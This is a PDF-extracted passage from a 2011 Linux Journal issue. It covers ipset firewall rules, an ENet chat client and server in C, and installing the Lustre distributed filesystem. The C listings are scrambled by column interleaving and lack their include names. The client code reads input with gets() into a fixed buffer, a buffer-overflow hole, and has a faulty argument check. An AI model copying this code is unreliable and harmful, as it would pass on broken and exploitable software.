four other privatenetworks (10.30.30.0/24, 10.40.40.0/24,192.168.4.0/23 and 172.22.0.0/22). Runthe following commands:ipset -N routed_nets nethashipset -A routed_nets 10.30.30.0/24ipset -A routed_nets 10.40.40.0/24ipset -A routed_nets 192.168.4.0/23ipset -A routed_nets 172.22.0.0/22iptables -t nat -A POSTROUTING \-s 10.0.0.0/24 \-m set ! --set routed_nets dst \-j MASQUERADEAs you can see, ipset makes it easy to zeroin on exactly what you want matched andwhat you don’t. This rule would masqueradeall traffic passing through the box from yourinternal LAN (10.0.0.0/24) except thosepackets bound for any of the networksin your routed_nets set, preserving normaldirect IP routing to those networks. Becausethis configuration is based purely on networkaddresses, you don’t have to worry about thetypes of connections in place (type of VPNs,number of hops and so on), nor do you have toworry about physical interfaces and topologies.This is how it should be. Because this is apure layer-3 (network layer) implementation,the underlying classifications required toachieve it should be pure layer-3 as well.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 67


FEATURE Advanced Firewall Configurations with ipsetLimiting Certain PCs to Have AccessOnly to Certain Public HostsLet’s say the boss is concerned about certainemployees playing on the Internet insteadof working and asks you to limit their PCs’access to a specific set of sites they need to beable to get to for their work, but he doesn’twant this to affect all PCs (such as his).To limit three PCs (10.0.0.5, 10.0.0.6and 10.0.0.7) to have outside accessonly to worksite1.com, worksite2.com andworksite3.com, run the following commands:ipset -N limited_hosts iphashipset -A limited_hosts 10.0.0.5ipset -A limited_hosts 10.0.0.6ipset -A limited_hosts 10.0.0.7ipset -N allowed_sites iphashipset -A allowed_sites worksite1.comipset -A allowed_sites worksite2.comipset -A allowed_sites worksite3.comiptables -I FORWARD \-m set --set limited_hosts src \-m set ! --set allowed_sites dst \-j DROPThis example matches against two setsin a single rule. If the source matcheslimited_hosts and the destination does notmatch allowed_sites, the packet is dropped(because limited_hosts are allowed tocommunicate only with allowed_sites).Note that because this rule is inthe FORWARD chain, it won’t affectcommunication to and from the firewall itself,nor will it affect internal traffic (because thattraffic wouldn’t even involve the firewall).Blocking Access to Hosts for All butCertain PCs (Inverse Scenario)Let’s say the boss wants to block access to aset of sites across all hosts on the LAN excepthis PC and his assistant’s PC. For variety,in this example, let’s match the boss andassistant PCs by MAC address instead of IP.Let’s say the MACs are 11:11:11:11:11:11and 22:22:22:22:22:22, and the sites to beblocked for everyone else are badsite1.com,badsite2.com and badsite3.com.In lieu of using a second ipset to match theMACs, let’s utilize multiple iptables commandswith the MARK target to mark packets forprocessing in subsequent rules in the same chain:ipset -N blocked_sites iphashipset -A blocked_sites badsite1.comipset -A blocked_sites badsite2.comipset -A blocked_sites badsite3.comiptables -I FORWARD -m mark --mark 0x187 -j DROPiptables -I FORWARD \-m mark --mark 0x187 \-m mac --mac-source 11:11:11:11:11:11 \-j MARK --set-mark 0x0iptables -I FORWARD \-m mark --mark 0x187 \-m mac --mac-source 22:22:22:22:22:22 \-j MARK --set-mark 0x0iptables -I FORWARD \-m set --set blocked_sites dst \-j MARK --set-mark 0x187As you can see, because you’re not usingipset to do all the matching work as in theprevious example, the commands are quite a bitmore involved and complex. Because there are68 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


multiple iptables commands, it’s necessary torecognize that their order is vitally important.Notice that these rules are being addedwith the -I option (insert) instead of -A(append). When a rule is inserted, it is addedto the top of the chain, pushing all theexisting rules down. Because each of theserules is being inserted, the effective order isreversed, because as each rule is added, it isinserted above the previous one.The last iptables command above actuallybecomes the first rule in the FORWARD chain.This rule matches all packets with a destinationmatching the blocked_sites ipset, and thenmarks those packets with 0x187 (an arbitrarilychosen hex number). The next two rules matchonly packets from the hosts to be excluded andthat are already marked with 0x187. These tworules then set the marks on those packets to0x0, which “clears” the 0x187 mark.Finally, the last iptables rule (which isrepresented by the first iptables commandabove) drops all packets with the 0x187 mark.This should match all packets with destinationsin the blocked_sites set except those packetscoming from either of the excluded MACs,because the mark on those packets is clearedbefore the DROP rule is reached.This is just one way to approach the problem.Other than using a second ipset, another waywould be to utilize user-defined chains.If you wanted to use a second ipset insteadof the mark technique, you wouldn’t beable to achieve the exact outcome as above,because ipset does not have a machash settype. There is a macipmap set type, however,but this requires matching on IP and MACstogether, not on MAC alone as above.Cautionary note: in most practical cases,this solution would not actually work forWeb sites, because many of the hosts thatmight be candidates for the blocked_sitesset (like Facebook, MySpace and so on) mayhave multiple IP addresses, and those IPsmay change frequently. A general limitationof iptables/ipset is that hostnames should bespecified only if they resolve to a single IP.Also, hostname lookups happen only at thetime the command is run, so if the IP addresschanges, the firewall rule will not be awareof the change and still will reference the oldIP. For this reason, a better way to accomplishthese types of Web access policies is with anHTTP proxy solution, such as Squid. That topicis obviously beyond the scope of this article.Automatically Ban Hosts That Attemptto Access Invalid Servicesipset also provides a “target extension”to iptables that provides a mechanismfor dynamically adding and removing setentries based on any iptables rule. Insteadof having to add entries manually with theipset command, you can have iptables addthem for you on the fly.For example, if a remote host tries toconnect to port 25, but you aren’t running anSMTP server, it probably is up to no good. Todeny that host the opportunity to try anythingelse proactively, use the following rules:ipset -N banned_hosts iphashiptables -A INPUT \-p tcp --dport 25 \WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 69


FEATURE Advanced Firewall Configurations with ipset-j SET --add-set banned_hosts srciptables -A INPUT \-m set --set banned_hosts src \-j DROPIf a packet arrives on port 25, say withsource address 1.1.1.1, it instantly is addedto banned_hosts, just as if this commandwere run:ipset -A banned_hosts 1.1.1.1All traffic from 1.1.1.1 is blocked from thatmoment forward because of the DROP rule.Note that this also will ban hosts that try torun a port scan unless they somehow know toavoid port 25.Clearing the Running ConfigIf you want to clear the ipset and iptablesconfig (sets, rules, entries) and reset to a freshopen firewall state (useful at the top of afirewall script), run the following commands:iptables -P INPUT ACCEPTiptables -P OUTPUT ACCEPTiptables -P FORWARD ACCEPTiptables -t filter -Fiptables -t raw -Fiptables -t nat -Fiptables -t mangle -Fipset -Fipset -XSets that are “in use”, which meansreferenced by one or more iptables rules,cannot be destroyed (with ipset -X). So,in order to ensure a complete “reset” fromany state, the iptables chains have to beflushed first (as illustrated above).Conclusionipset adds many useful features andcapabilities to the already very powerfulnetfilter/iptables suite. As described in thisarticle, ipset not only provides new firewallconfiguration possibilities, but it alsosimplifies many setups that are difficult,awkward or less efficient to construct withiptables alone.Any time you want to apply firewall rulesto groups of hosts or addresses at once, youshould be using ipset. As I showed in a fewexamples, you also can combine ipset withsome of the more exotic iptables features,such as packet marking, to accomplish allsorts of designs and network policies.The next time you’re working on yourfirewall setup, consider adding ipset to themix. I think you will be surprised at just howuseful and flexible it can be.■Henry Van Styn is the founder of IntelliTree Solutions, an ITconsulting and software development firm located in Cincinnati,Ohio. Henry has been developing software and solutions for morethan ten years, ranging from sophisticated Web applications tolow-level network and system utilities. He is the author of StrongBranch <strong>Linux</strong>, an in-house server distribution based on Gentoo.Henry can be contacted at www.intellitree.com.ResourcesNetfilter/iptables Project Home Page: www.netfilter.orgipset Home Page: ipset.netfilter.org70 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


Oct. 12, 13, & 14for BUILDING SUCCESSFUL WEBSITESFeaturing Awesome Speakers!JeffreyZELDMANJeffROBBINSJoshCLARKAlso Karen McGrane, Angela Byron, Karen Stevenson, Jeff Eaton, Ryan Szrama & more!Do it with Drupal sessions are designed for you, covering the latestDrupal information and best practices as well as a wide array of topicsbeyond Drupal like UX, mobile apps, web typography, & more. Do it withDrupal provides practical information you can start using right away!Use coupon code LJ100 when you register & save $100!* coupon code expires <strong>October</strong> 10thdoitwithdrupal.com


CROSS-PLATFORM NETWORK PROGRAMMING MADE EASY.Mike DiehlCreating a multiplayer game can bea lot of fun, but navigating thecomplexities of IP network programmingcan be a headache. That’s kind of a strangestatement, but the two go hand in hand. Youcan’t write a multiplayer game without somesort of network-based communications,and game-related network programmingintroduces difficulties not often found withmore simple applications. For example,most game developers are concernedwith bandwidth utilization and throttling.There’s also player session management tocontend with. Then, there’s the problem ofmessage fragmentation, acknowledgementand sequencing. Oh, and you’d really liketo be able to make your game run on both<strong>Linux</strong> and Windows. That’s a tall orderfor developers who probably are moreconcerned with writing their games thanthey are in becoming experts in crossplatformnetwork programming. Fortunately,72 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


the ENet library (enet.bespin.org) takes careof these details and presents developers witha simple, flexible and consistent API.ENet’s event-driven programming modelmakes client session management verysimple. The library dispatches an eventwhen a peer connects or disconnects, andwhen a message is received from a peer.The developer simply writes event handlersthat take care of initializing and deallocatingresources, and acting upon incomingmessages. This means you don’t have toworry about the complexities of forking,preforking, threading or nonblocking callsto connect() and accept() in order to handlemultiple connections. With ENet, all you dois make periodic calls to its event dispatcherand handle the events as they come in.ENet provides for both reliable andunreliable transmission. The networkingindustry really needs to find a better termthan “unreliable”, however. Unreliablemeans that a packet will be sent out, butthe receiving end won’t be expected toacknowledge receiving the packet. In a“reliable” protocol, every packet must beacknowledged upon receipt. If a peer sendsout a packet and requests acknowledgementand doesn’t receive it in a timely fashion, thepacket will be resent automatically until it isacknowledged, or the peer is deemed tobe unreachable. The nice thing about ENetis that the same API provides both reliableand unreliable semantics.ENet also makes it easy to write real-timeclient-server applications by taking careof packet fragmentation and sequencingchores for you. Put simply, fragmentationand reassembly is done automatically andis transparent to the developer. Sequencingalso is handled transparently and can beturned on and off at will. ENet’s conceptof a communications channel is relatedto sequencing. ENet buffers each channelseparately and empties each buffer innumerical sequence. The end result is thatyou can transmit multiple data streams andthat lower-numbered channels have higherpriority. For example, you could put all realtimegame update packets into channel 1,while system status packets could be in alower-priority channel.For the sake of demonstration, I discussboth the client and server for a simple chatprogram. The code I’m using is based on a3-D video game I’m writing in my limitedfree time. However, while stripping thecode down to its basics, I left somethingout and couldn’t get it to work. So, Iposted a description of my problem andcode snippets to the ENet e-mail list. Withinan hour, I had a reply that showed me howto fix my problem. Thanks, Nuno.In this example, a user starts the clientand provides a user name as a commandparameter. Once a client session has beencreated, the client is expected to tell the serverthe name of the user, as the very first messagesent from the client. Then, anything the usertypes will be sent to the server. Any messagesthat come from the server will be displayedon the client’s screen. Because all user inputis taken in a blocking fashion, the user won’tactually see any incoming messages untilWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 73


FEATURE Network Programing with ENetListing 1. config.hListing 2. Client Code#define HOST "localhost"#define PORT (7000)#define BUFFERSIZE (1000)pressing the Enter key. This isn’t ideal, but thepoint of the code is to demonstrate the ENetlibrary, not nonblocking I/O on STDIN andthe necessary cursor control. (In a real-worldsituation, your programs would be generatingmessages, such as player movement andprojectile impact, in real time anyway.) Ifthe user simply presses the Enter key, nomessage is sent to the server, but anyqueued-up messages will be displayed.If the user types the letter q and pressesEnter, the client disconnects and terminates.The server also is very simple. When aclient connects, the server waits for theclient to identify the user. Then, the serversends a broadcast message announcingthe new user’s connections. When a clientdisconnects, that fact also is broadcast toall connected users. When a client sendsa message, that message is sent to everyconnected client, except the one who sentit. Like I said, it’s a very simple chat system.Let’s look at some code. First, let’s get afew #defines out of the way. Take a look atconfig.h shown in Listing 1.This is pretty straightforward, so let’slook at the client code shown in Listing 2.Lines 1–17 are boilerplate. Note that on line3, I include enet/enet.h and not simply enet.h.The ENet documentation indicates that enet.h1 #include 2 #include 3 #include 4 #include "config.h"5 #include 6 char buffer[BUFFERSIZE];7 ENetHost *client;8 ENetAddress address;9 ENetEvent event;10 ENetPeer *peer;11 ENetPacket *packet;12 int main(int argc, char ** argv) {13 int connected=0;14 if (argc != 1) {15 printf("Usage: client username\n");16 exit;17 }18 if (enet_initialize() != 0) {19 printf("Could not initialize enet.\n");20 return 0;21 }22 client = enet_host_create(NULL, 1, 2, 5760/8, 1440/8);23 if (client == NULL) {24 printf("Could not create client.\n");74 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


25 return 0;26 }48 switch (event.type) {49 case ENET_EVENT_TYPE_RECEIVE:50 puts( (char*) event.packet->data);27 enet_address_set_host(&address, HOST);28 address.port = PORT;51 break;52 case ENET_EVENT_TYPE_DISCONNECT:53 connected=0;29 peer = enet_host_connect(client, &address, 2, 0);54 printf("You have been disconnected.\n");55 return 2;30 if (peer == NULL) {31 printf("Could not connect to server\n");56 }57 }32 return 0;33 }58 if (connected) {59 printf("Input: ");34 if (enet_host_service(client, &event, 1000) > 0 &&60 gets(buffer);35 event.type == ENET_EVENT_TYPE_CONNECT) {61 if (strlen(buffer) == 0) { continue; }36 printf("Connection to %s succeeded.\n", HOST);37 connected++;62 if (strncmp("q", buffer, BUFFERSIZE) == 0) {63 connected=0;38 strncpy(buffer, argv[1], BUFFERSIZE);39 packet = enet_packet_create(buffer, strlen(buffer)+1,ENET_PACKET_FLAG_RELIABLE);64 enet_peer_disconnect(peer, 0);65 continue;66 }40 enet_peer_send(peer, 0, packet);67 packet = enet_packet_create(buffer, strlen(buffer)+1,41 } else {42 enet_peer_reset(peer);43 printf("Could not connect to %s.\n", HOST);44 return 0;ENET_PACKET_FLAG_RELIABLE);68 enet_peer_send(peer, 0, packet);69 }70 }45 }71 enet_deinitialize();46 while (1) {72 }47 while (enet_host_service(client, &event, 1000) > 0) {WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 75


FEATURE Network Programing with ENetmay conflict on some systems, so the enetdirectory must be used. The global bufferdefined on line 6 is where I will put userinput. Lines 7–11 simply define some variablesthat the ENet library requires.The real ENet code begins on line 18 withthe call to enet_initialize(). Once the libraryis initialized, I create the client host on line22. As you’ll see, clients and servers are bothcreated with a call to enet_host_create(). Theonly difference is that for a client, you sendNULL as the first argument. For a server, thisargument tells ENet what address to bindto. Because a client doesn’t have to bind,you pass in NULL. The second argument setsthe limit on how many connections to makeroom for. This example client will connectonly to one server, so I pass in 1. These twoarguments are the only differences betweencreating a client and a server!The third argument indicates how manychannels I expect to use, 0-indexed by theway. Finally, the last two arguments indicatebandwidth limitations in bits per second forupload and download, respectively. Of course,I check to see if the call to enet_host_create()was successful and continue.Lines 27–33 tell the client what address andport the server is on and to try to connect toit. If the client can’t connect, it will terminate.If the program gets to line 34, it hasconnected to the server, and it’s time toidentify the user. The enet_host_service()function is ENet’s event dispatcher, but thiswill be made more clear in the server code.For now, understand that all I’m doingis waiting for the server to confirm theListing 3. Server Code1 #include 2 #include 3 #include 4 #include 5 #include "config.h"6 ENetAddress address;7 ENetHost *server;8 ENetEvent event;9 ENetPacket *packet;10 char buffer[BUFFERSIZE];11 int main(int argc, char ** argv) {12 int i;13 if (enet_initialize() != 0) {14 printf("Could not initialize enet.");15 return 0;16 }17 address.host = ENET_HOST_ANY;18 address.port = PORT;19 server = enet_host_create(&address, 100, 2, 0, 0);20 if (server == NULL) {21 printf("Could not start server.\n");22 return 0;23 }24 while (1) {25 while (enet_host_service(server, &event, 1000) > 0) {76 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


26 switch (event.type) {48 }49 break;27 case ENET_EVENT_TYPE_CONNECT:28 break;50 case ENET_EVENT_TYPE_DISCONNECT:51 sprintf(buffer, "%s has disconnected.", (char*)29 case ENET_EVENT_TYPE_RECEIVE:30 if (event.peer->data == NULL) {31 event.peer->data =malloc(strlen((char*) event.packet->data)+1);32 strcpy((char*) event.peer->data, (char*)event.packet->data);event.peer->data);52 packet = enet_packet_create(buffer, strlen(buffer)+1, 0);53 enet_host_broadcast(server, 1, packet);54 free(event.peer->data);55 event.peer->data = NULL;56 break;33 sprintf(buffer, "%s has connected\n",(char*) event.packet->data);34 packet = enet_packet_create(buffer,strlen(buffer)+1, 0);57 default:58 printf("Tick tock.\n");59 break;60 }35 enet_host_broadcast(server, 1, packet);36 enet_host_flush(server);37 } else {61 }62 }38 for (i=0; ipeerCount; i++) {39 if (&server->peers[i] != event.peer) {40 sprintf(buffer, "%s: %s",41 (char*) event.peer->data, (char*)63 enet_host_destroy(server);64 enet_deinitialize();65 }event.packet->data);42 packet = enet_packet_create(buffer,strlen(buffer)+1, 0);43 enet_peer_send(&server->peers[i], 0,packet);44 enet_host_flush(server);45 } else {46 }47 }WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 77


FEATURE Network Programing with ENetconnection so you can identify yourselves. If youdon’t see the ENET_EVENT_TYPE_CONNECT,you know you didn’t really get connectedand should terminate. On lines 38–41, Icreate and send a packet to the server thatsimply contains the user’s name. (I’ll havemore to say about packets when I examinethe server code.)The rest of the program, from line 46, is themain event loop. (I’ll discuss enet_host_service()and the switch statement that follows it inmore detail when I discuss the server.) Thecode starting from line 58 is fairly simple.Here I get input from the user and check ifit’s an empty line or if it’s a line with just a qon it. Otherwise, I create a packet and sendit. Obviously, I never really get to line 71,but I included it for instructional purposes.The client really isn’t very difficult towrite and understand. As you’re about tosee, the server code is almost identical. Let’stake a look at the server code in Listing 3.As you can see, the first 24 lines of codeare almost identical to those found in theclient code, with two notable exceptions. Onlines 17–19, I tell the server to bind to thedefault IP address, 0.0.0.0, and allocate spacefor up to 100 client connections. In this case, Idon’t set any limits on bandwidth utilization.On line 25, I call enet_host_service() untilit returns 0. Each time enet_host_service()returns a nonzero value, I know thatsomething has happened, and the switchstatement that follows is used to determinewhat happened. Note the third argumentindicates how many milliseconds to wait forsomething to happen. If I had passed a 0 inthis argument, the call to enet_host_service()would be completely nonblocking.The ENET_EVENT_TYPE_CONNECT eventindicates that a client has connected to theserver. Normally, you’d want to initializeresources for the client. But in this case,there is nothing to do until the client hasidentified itself. I left this case intact forinstructional purposes.THE CLIENT REALLY ISN’T VERY DIFFICULT TO WRITE AND UNDERSTAND.AS YOU’RE ABOUT TO SEE, THE SERVER CODE IS ALMOST IDENTICAL.The ENET_EVENT_TYPE_RECEIVE eventis dispatched when the server receives amessage from a client. For this event, thereare two possible scenarios:1. The client hasn’t identified itself yet,and this is the first message I’ve receivedfrom them.2. The client has been identified, and this is anormal chat message.I check to see which is the case in theconditional on line 30. This line also pointsout an issue that comes up in the forumsfrom time to time, so I’ll explain it in a bitmore detail.Most server applications have to store atleast some information about each client.Typically, they use an array of structures to78 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


store this information. Intuition tells youthat one of the things you should storein a given client’s structure is a pointerto whatever data type allows you tocommunicate with it. But with ENet, thatintuition is wrong. Instead, ENet’s peer datatype provides a field, data, that you can useto store a pointer. This pointer presumablywould point to the client’s informationstructure. So, it’s almost backward fromwhat you expect. But, this is kind of anelegant solution; ENet manages its data,and you manage yours, separately.The only client data that you care aboutis the name of the user associated with agiven client. If you don’t already have theuser’s name, and you receive a messagefrom his or her client, you can assume thatthe client is identifying itself to you andyou should store the user’s name. I do thisin lines 31 and 32. Then, in lines 33–36, Iannounce the new user to the rest of theclients. Note that I create a packet on line34, but the call to enet_host_broadcast()deallocates it. It is a major error todeallocate that data structure yourself.In lines 37–49, you can see the casewhere the client already is identified. All youhave to do is send a message to the otherclients indicating the name of the “speaker”and what he or she “said”. To do this, youloop over ENet’s list of peers. For each peer,check to see if it’s the same peer that sentthe message. If it is, you skip it, as peoplereally don’t want their own messages echoedback to them. Otherwise, you create amessage and send it. This way, each clientknows what was said, and by whom.The ENET_EVENT_TYPE_DISCONNECTevent indicates that a client hasdisconnected. In this case, you announcethat the user has disconnected anddeallocate the space used to store theuser’s name. On line 55, I set the datapointer back to NULL just in case ENetdecides to re-use this structure whenanother client connects.If no event is received, the default case isexecuted, and the server simply prints “Ticktock” to the console, as a reassurance thatit is still running.And, there you have it—a chat client in 72lines of code and a multi-user chat server in65 lines of code, and much of the code wasidentical. In fact, in the program upon whichthis code is based, I actually use identicalcode for both the client and server. Ratherthan have a block of code in the switchstatement, I simply call an event handler,which is implemented in a separate codemodule, one for the client and one for theserver. Then, depending on which module Ilink against, I can have a client or a server.This has the added benefit of isolating all ofthe ENet-specific code in one source file.As you can see, the ENet library is almosttrivial to use, but it encapsulates sophisticatednetwork communications capabilities. Ofcourse, what this really means is that it’sjust fun to use.■Mike Diehl operates Diehlnet Communications, LLC, a small IPphone company. Mike lives in Albuquerque, New Mexico, with hiswife and three sons. He can be reached at mdiehl@diehlnet.com.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 79


THELUSTREDISTRIBUTEDFILESYSTEMDEPLOY A SCALABLE AND HIGH-PERFORMING DISTRIBUTEDFILESYSTEM IN YOUR CLUSTERED ENVIRONMENT WITH LUSTRE.There comes a time in a network or storage administrator’scareer when a large collection of storage volumes needs to bepooled together and distributed within a clustered or multipleclient network, while maintaining high performance withlittle to no bottlenecks when accessing the same files. That iswhere Lustre comes into the picture. The Lustre filesystem isa high-performance distributed filesystem intended for largernetwork and high-availability environments.PETROS KOUTOUPIS80 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


The Storage Area Network and <strong>Linux</strong>Traditionally, Lustre is configured to manageremote data storage disk devices within aStorage Area Network (SAN), which is twoor more remotely attached disk devicescommunicating via a Small Computer SystemInterface (SCSI) protocol. This includes FibreChannel, Fibre Channel over Ethernet (FCoE),Serial Attached SCSI (SAS) and even iSCSI. Tobetter explain what a SAN is, it may be morebeneficial to begin with what it isn’t. Forinstance, a SAN shouldn’t be confused witha Local Area Network (LAN), even if that LANcarries storage traffic (that is, via networkedfilesystems shares and so on). Only if the LANcarries storage traffic using the iSCSI or FCoEprotocols can it then be considered a SAN.Another thing that a SAN isn’t is NetworkAttached Storage (NAS). Again, the SAN reliesheavily on a SCSI protocol, while the NAS usesthe NFS and SMB/CIFS file-sharing protocols.An external storage target device willrepresent storage volumes as Logical Unitswithin the SAN. Typically, a set of Logical Unitswill be mapped across a SAN to an initiatornode—in our case, it would be the server(s)managing the Lustre filesystem. In turn, theserver(s) will identify one or more SCSI diskdevices within its SCSI subsystem and treatthem as if they were local drives. The amountof SCSI disks identified is determined by theamount of Logical Units mapped to the initiator.If you want to follow along with the exampleshere, it is relatively simple to configure acouple virtual machines: one as the servernode with one or more additional disk devicesto export and the second to act as a clientnode and mountthe Lustre enabledvolume. Although itis bad practice, fortesting purposes,it also is possibleto have a singlevirtual machineconfigured as bothserver and client.SCSISCSI is an ANSIstandardizedhardwareand softwarecomputinginterfaceadopted by allearly storageThe Distributedmanufacturers.FilesystemRevisedA distributededitions offilesystem allowsthe standardaccess to files frommultiple hostscontinue to besharing a computer used today.network. Thismakes it possiblefor multiple users on multiple client nodesto share files and storage resources. Theclient nodes do not have direct access to theunderlying block storage but interact over thenetwork using a protocol and, thus, make itpossible to restrict access to the filesystemdepending on access lists or capabilities onboth the servers and the clients, unlike aclustered filesystem, where all nodes haveequal access to the block storage where thefilesystem is located. On these systems, theaccess control must reside on the client. Otheradvantages to utilizing distributed filesystemsinclude the fact that they may involve facilitiesfor transparent replication and fault tolerance.So, when a limited number of nodes in afilesystem goes off-line, the system continuesWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 81


FEATURE The Lustre Distributed Filesystemto work without any data loss.Lustre (or <strong>Linux</strong> Cluster) is one suchdistributed filesystem, usually deployedfor large-scale cluster computing. Licensedunder the GNU General Public License (orGPL), Lustre provides a solution in whichhigh performance and scalability to tens ofthousands of nodes and petabytes of storagebecomes a reality and is relatively simple todeploy and configure. Despite the fact thatLustre 2.0 has been released, for this article, Iwork with the generally available 1.8.5.Lustre contains a somewhat uniquearchitecture, with three major functionalunits. One is a single metadata server orMDS that contains a single metadata targetor MDT for each Lustre filesystem. Thisstores namespace metadata, which includesfilenames, directories, access permissionsand file layout. The MDT data is stored in asingle disk filesystem mapped locally to theserving node and is a dedicated filesystemthat controls file access and informs theclient node(s) which object(s) make up a file.Second are one or more object storage servers(OSSes) that store file data on one or moreobject storage targets or OST. An OST is adedicated object-base filesystem exported forread/write operations. The capacity of a Lustrefilesystem is determined by the sum of thetotal capacities of the OSTs. Finally, there’s theclient(s) that accesses and uses the file data.Lustre presents all clients with a unifiednamespace for all of the files and data inthe filesystem that allow concurrent andcoherent read and write access to the files inthe filesystem. When a client accesses a file, itcompletes a filename lookup on the MDS, andeither a new file is created or the layout of anexisting file is returned to the client. Lockingthe file on the OST, the client will then runone or more read or write operations to thefile but will not directly modify the objectson the OST. Instead, it will delegate tasks tothe OSS. This approach will ensure scalabilityand improved security and reliability, as itdoes not allow direct access to the underlyingstorage, thus, increasing the risk of filesystemcorruption from misbehaving/defective clients.Although all three components (MDT, OSTand client) can run on the same node, theytypically are configured on separate nodescommunicating over a network (see thedetails on LNET later in this article). In thisexample, I’m running the MDT and OST ona single server node while the client will beaccessing the OST from a separate node.Installing LustreTo obtain Lustre 1.8.5, download the prebuiltbinaries packaged in RPMs, or download thesource and build the modules and utilitiesfor your respective <strong>Linux</strong> distribution. Oracleprovides server RPM packages for bothOracle Enterprise <strong>Linux</strong> (OEL) 5 and Red HatEnterprise <strong>Linux</strong> (RHEL) 5, while also providingclient RPM packages for OEL 5, RHEL 5 andSUSE <strong>Linux</strong> Enterprise Server (SLES) 10,11.If you will be building Lustre from source,ensure that you are using a <strong>Linux</strong> kernel2.6.16 or greater. Note that in all deploymentsof Lustre, the server that runs on an MDS,MGS (discussed below) or OSS must utilize apatched kernel. Running a patched kernel on82 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


a Lustre client is optional and required only ifthe client will be used for multiple purposes,such as running as both a client and an OST.If you already have a supported operatingsystem, make sure that the patched kernel,lustre-modules, lustre-ldiskfs (a Lustre-patchedbacking filesystem kernel module packagefor the ext3 filesystem), lustre (which includesuserspace utilities to configure and run Lustre)and e2fsprogs packages are installed on the hostsystem while also resolving its dependenciesfrom a local or remote repository. Use the rpmcommand to install all necessary packages:$ sudo rpm -ivh kernel-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.i686.rpm$ sudo rpm -ivh lustre-modules-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm$ sudo rpm -ivh lustre-ldiskfs-3.1.3-2.6.18_194.3.1.0.1.el5_View the /boot/grub/grub.conf file tovalidate that the newly installed kernel hasbeen set as the default kernel. Now that allpackages have been installed, a reboot isrequired to load the new kernel image. Oncethe system has been rebooted, an invocationof the uname command will reveal thecurrently booted kernel image:[petros@lustre-host ~]$ uname -a<strong>Linux</strong> lustre-host 2.6.18-194.3.1.0.1.el5_lustre.1.8.4 #1SMP Mon Jul 26 22:12:56 MDT 2010 i686 i686 i386 GNU/<strong>Linux</strong>Meanwhile, on the client side, the packagesfor the lustre client (utilities for patchlessclients) and lustre client modules (modulesfor patchless clients) need to be installed onall desired client machines:lustre.1.8.4.i686.rpm$ sudo rpm -ivh lustre-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm$ sudo rpm -ivh lustre-client-1.8.4-2.6.18_194.3.1.0.1.el5_lustre.1.8.4.i686.rpm$ sudo rpm -ivh lustre-client-modules-1.8.4-2.6.18_194.3.1.0.1.el5_$ sudo rpm -ivh e2fsprogs-1.41.10.sun2-0redhat.oel5.i386.rpmlustre.1.8.4.i686.rpmAfter these packages have been installed,list the boot directory to reveal the newlyinstalled patched <strong>Linux</strong> kernel:[petros@lustre-host ~]$ ls /boot/config-2.6.18-194.3.1.0.1.el5_lustre.1.8.4grubinitrd-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.imglost+foundsymvers-2.6.18-194.3.1.0.1.el5_lustre.1.8.4.gzSystem.map-2.6.18-194.3.1.0.1.el5_lustre.1.8.4vmlinuz-2.6.18-194.3.1.0.1.el5_lustre.1.8.4Note that these client machines need tobe within the same network as the hostmachine serving the Lustre filesystem.After the packages are installed, reboot allaffected client machines.Configuring Lustre ServerIn order to configure the Lustre filesystem,you need to configure Lustre Networking,or LNET, which provides the communicationinfrastructure required by the Lustre filesystem.LNET supports many commonly used networktypes, which include InfiniBand and IPWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 83


FEATURE The Lustre Distributed Filesystemnetworks. It allows simultaneous availabilityacross multiple network types with routingbetween them. In this example, let’s use tcp,so use your favorite editor to append thefollowing line to the /etc/modprobe.conf file:options lnet networks=tcpThis step restricts LNET to be usingonly the specified network interfaces andprevents LNET from using all networkinterfaces.Before moving on, it is important todiscuss the role of the Management Serveror MGS. The MGS stores configurationinformation for all Lustre filesystems in aclustered setup. An OST contacts the MGSto provide information, while the client(s)contact the MGS to retrieve information.The MGS requires its own disk for storage,although there is a provision that allowsthe MGS to share a disk with a single MDT.Type the following command to create acombined MGS/MDT node:[petros@lustre-host ~]$ sudo /usr/sbin/mkfs.lustre--fsname=lustre --mgs --mdt /dev/sda1Permanent disk data:Target:Index:Lustre FS:lustre-MDTffffunassignedlustreMount type: ldiskfsFlags:0x75Try Before You Buy!Benchmark Your Code on Our GPU Cluster withAMBER, NAMD, or Custom CUDA CodesConfigure your WhisperStation or Cluster today!www.microway.com/tesla or 508-746-7341NEW Microway MD SimCluster with8 Tesla M2090 GPUs, 8 CPUs and InfiniBand30% Improvement Over Previous TeslasGSA ScheduleContract Number:GS-35F-0431N


